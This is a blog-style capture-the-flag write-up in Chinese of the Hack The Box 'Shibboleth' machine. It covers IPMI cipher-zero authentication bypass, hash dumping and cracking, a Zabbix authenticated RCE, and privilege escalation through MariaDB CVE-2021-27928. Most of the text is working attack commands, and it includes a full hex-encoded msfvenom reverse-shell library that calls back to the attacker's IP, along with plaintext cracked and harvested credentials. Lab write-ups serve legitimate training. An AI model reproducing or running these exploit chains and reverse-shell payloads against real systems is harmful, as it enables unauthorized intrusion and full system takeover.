Shibboleth

NMAP

1
2
3

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41
Service Info: Host: shibboleth.htb

列舉

subdomain

1	`wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u Shibboleth.htb -H 'host:FUZZ.Shibboleth.htb' --hw 26`

UDP

1	`nmap -Pn -n -sU -p- --min-rate 2000 10.10.11.124 --open`

IPMI
1
2
3
msfconsole scanner/ipmi/ipmi_version

1
2
3

在ipmi 2.0 有漏洞存在 密碼類行為0 可在使用者名稱存在的情況下繞過密碼訪問

auxiliary/scanner/ipmi/ipmi_cipher_zero

1	`ipmitool -I lanplus -C 0 -H 10.10.11.124 -U 'Administrator' -P '123123' user list`

msf 的hashdump撈出hash

scanner/ipmi/ipmi_dumphashes

Administrator:b16b065082040000da227631f53903b97f689ad6fc911214d483e5be6bec934d5e7b31dde781a5b4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:065dbfeb348ccce0b7ac7337e764c00c7e083192

hashcat crack IPMI2 RAKP HMAC-SHA1

1
2
3

hashcat -m 7300 -a 0 hash /usr/share/wordlists/rockyou.txt

ilovepumkinpie1

登入zabbix

1 2	`利用剛剛獲得的憑證Administrator:ilovepumkinpie1 登入zabbix`

外殼

1
2
3

Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)

python3 50816.py http://zabbix.shibboleth.htb/ 'Administrator' 'ilovepumkinpie1' 10.10.14.6 443

reverse shell

提權

利用同一組密碼切換使用者到ipmi-svc

/etc/zabbix 為zabbix設定檔 找尋有無mysql帳密

grep "db" -nir .

# zabbix:bloooarskybluh

漏洞利用

查看mariadb 版本
select @@version;
10.3.25-MariaDB-0ubuntu0.20.04.1 

MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
https://github.com/Al1ex/CVE-2021-27928

1	`msfvenom -p linux/x64/shell_reverse_tcp lhost=10.10.14.6 lport=443 -f elf-so > journalctl.so`

python3 -c 'print(open("journalctl.so","rb").read().hex())'
<-c 'print(open("journalctl.so","rb").read().hex())'

7f454c4602010100000000000000000003003e000100000092010000000000004000000000000000b000000000000000000000004000380002004000020001000100000007000000000000000000000000000000000000000000000000000000dc0100000000000026020000000000000010000000000000020000000700000030010000000000003001000000000000300100000000000060000000000000006000000000000000001000000000000001000000060000000000000000000000300100000000000030010000000000006000000000000000000000000000000008000000000000000700000000000000000000000300000000000000000000009001000000000000900100000000000002000000000000000000000000000000000000000000000000000000000000000c00000000000000920100000000000005000000000000009001000000000000060000000000000090010000000000000a0000000000000000000000000000000b0000000000000000000000000000000000000000000000000000000000000000006a2958996a025f6a015e0f05489748b9020001bb0a0a0e06514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05

直接傳輸或是直接寫入

select unhex('7f454c4602010100000000000000000003003e000100000092010000000000004000000000000000b000000000000000000000004000380002004000020001000100000007000000000000000000000000000000000000000000000000000000dc0100000000000026020000000000000010000000000000020000000700000030010000000000003001000000000000300100000000000060000000000000006000000000000000001000000000000001000000060000000000000000000000300100000000000030010000000000006000000000000000000000000000000008000000000000000700000000000000000000000300000000000000000000009001000000000000900100000000000002000000000000000000000000000000000000000000000000000000000000000c00000000000000920100000000000005000000000000009001000000000000060000000000000090010000000000000a0000000000000000000000000000000b0000000000000000000000000000000000000000000000000000000000000000006a2958996a025f6a015e0f05489748b9020001bb0a0a0e06514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05') into dumpfile '/tmp/journalctl.so';
<34889e752574889e60f05')

1 2	`set global wsrep_provider="/tmp/journalctl.so"; nc -lvnp 443`

HTB > 靶機

#IPMI #Zabbix #mariaDB

HTB-Shibboleth

https://0xbe61a55f.github.io/2022/11/30/HTB-Shibboleth/

作者

Giwawa

發布於

2022年11月30日

許可協議

Pwn基礎知識上一篇